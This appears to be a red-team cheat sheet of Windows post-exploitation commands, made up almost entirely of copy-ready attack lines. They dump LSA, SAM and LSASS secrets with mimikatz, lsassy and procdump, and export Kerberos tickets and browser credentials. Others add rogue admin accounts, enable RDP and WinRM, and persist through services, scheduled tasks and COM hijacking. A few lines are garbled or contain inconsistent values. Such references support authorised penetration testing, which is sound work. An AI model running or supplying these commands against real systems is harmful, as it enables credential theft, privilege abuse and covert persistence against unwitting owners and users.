Post-Ex Windows
Dump secrets
LSA
crackmapexec smb perim_up.txt -u '<user>' -d '<domain>' -p '<pass>' --lsa
SAM
crackmapexec smb <host_file> -u <user> -d <domain> -H <hash> --sam
reg save hklm\sam .\sam reg save hklm\system .\system reg save hklm\security .\security
impacket-secretsdump -sam SAM -security SECURITY -system SYSTEM LOCAL
LSASS
crackmapexec smb <host_file> -u <user> -d <domain> -H <hash> -M lsassy
lsassy -d '.' -u 'Administrateur' -H '<hash>' <ip>
lsassy -d <domain> -u <user> -p <pass> <ip>
./spraykatz.py -u <user> -p <password> -t <ip>
pypykatz lsa minidump lsass.dmp
procdump.exe --accepteula -ma lsass c:\WINDOWS\Temp\lsass.txt
.\mimikatz.exe "log" "privilege::debug" "sekurlsa::logonpasswords" exit
Kerberos
.\mimikatz.exe "log" "privilege::debug" "kerberos::list /export" exit
Browser secrets
sharpchrome.exe
Create/add new local admin account
net user add <user> <pass>
net localgroup "Administrators" <user> /add
Enable WinRM
Enable-PSRemoting -SkipNetworkProfileCheck -Force
Enable RDP
Set-ItemProperty -Path 'HKLM:\System\CurrentControlSet\Control\Terminal Server' -name "fDenyTSConnections" -value 0
add user to RDP group
net localgroup "Remote Desktop Users" <user> /add
Create service
New-Service -BinaryPathName C:\Users\sqlServer\Documents\system2.exe -Name syshell -DisplayName syshell -StartupType Automatic
Start-Service syshell
sc \\127.0.0.1 create ServiceName binpath=C:\windows\system32\calc.exe
\192.168.1.2 is optional
To check if service working well, you can reboot like this:
wmic /node:192.168.1.2 os get buildnumber
then
wmic /node:192.168.1.2 os where buildnumber="<Number>" call reboot
Execute binary using WMIC
wmic /node:127.0.0.1 process call create "C:\windows\system32\calc.exe"
/node is optional
Stop processus
Run this to get processid : sc \\127.0.0.1 query ServiceName
then : wmic /node:127.0.0.1 process where processid=<PID> call terminate
/node is optional
and then taskkill /S 127.0.0.1 /PID <PID> /f
/S is optional
Create Scheduled tasks
schtasks /create /S 192.156.1.2 /tn <name> /sc once /sd 01/01/1910 /ru system /tr “C:\windows\system32\calc.exe”
Other
schtasks /create /S 127.0.0.1 /tn OBLIGE /tr "C:\windows\system32\calc.exe" /sc once /ST 18:30
ru
, and /S is optional To check if tasks has been created run this schtasks /s 192.156.1.2 /query /tn <name>
COM hijack
schtasks /query /xml > tasks.xml
reg query "HKCR\CLSID\{<COM_CLSID>}\Inprocserver32"
reg query "HKCU\software\classes\CLSID\{<COM_CLSID>}\Inprocserver32"
reg query "HKLM\software\classes\CLSID\{<COM_CLSID>}\Inprocserver32"
reg export "HKLM\software\classes\CLSID\{<COM_CLSID>}\Inprocserver32" export.reg
# Change to HKCU and change dll
reg import export.reg /reg:64
reg query "HKCR\CLSID\{<COM_CLSID>}\Inprocserver32"
reg query "HKCU\software\classes\CLSID\{<COM_CLSID>}\Inprocserver32"
Disconnect User
rwinsta /server:192.168.1.2 <sessionId>
to get sessionId please run this
qwinsta